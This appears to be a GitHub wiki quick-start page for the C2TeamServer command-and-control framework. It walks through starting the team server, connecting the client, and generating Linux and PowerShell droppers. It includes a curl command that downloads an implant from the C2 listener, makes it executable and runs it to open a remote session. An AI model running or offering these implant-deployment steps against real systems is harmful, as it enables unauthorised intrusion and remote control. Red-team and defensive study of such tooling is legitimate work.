Skip to content

8 ‐ How to from zero

Jump to bottom
Maxime dcb edited this page Apr 1, 2025 · 1 revision

Quick setup

On one terminal launch the TeamServer:

cd /opt
wget -q $(wget -q -O - 'https://api.github.com/repos/maxDcb/C2TeamServer/releases/latest' | jq -r '.assets[] | select(.name=="Release.tar.gz").browser_download_url') -O ./C2TeamServer.tar.gz && mkdir C2TeamServer && tar xf C2TeamServer.tar.gz -C C2TeamServer --strip-components 1
rm C2TeamServer.tar.gz
cd /opt/C2TeamServer/TeamServer
vi TeamServerConfig.json
# edit DomainName or ExposedIp to reflect where the beacon will connect back to
./TeamServer

On another terminal launch the client:

pipx install git+https://github.com/maxDcb/C2TeamServer.git#subdirectory=C2Client 
export C2_CERT_PATH=/opt/C2TeamServer/TeamServer/server.crt
c2client --ip 127.0.0.0 --port 50051 --dev

You are presented with the client, a listener is already launched on 0.0.0.0:8443:

image

First linux implant

On the "Terminal" tab we will generate a linux dropper, in my example the Listener hash is "oHsu7BjR":

Dropper ElfDropper oH oH

It is possible that the cloning of the dropper repositories didn't set the rights of some scripts. In this case you will need to "chmod +x" those scripts.

image

Let's launch the presented cmd on our linux machine:

curl -k https://10.0.2.15:8443/images/commun/1.084.4584/serv/implant -o ./test
chmod +x ./test
./test

image

A new sessions is now displayed on the client and ready to be used:

image

First windows implant

Dropper PowershellWebDelivery oH o

image

Clone this wiki locally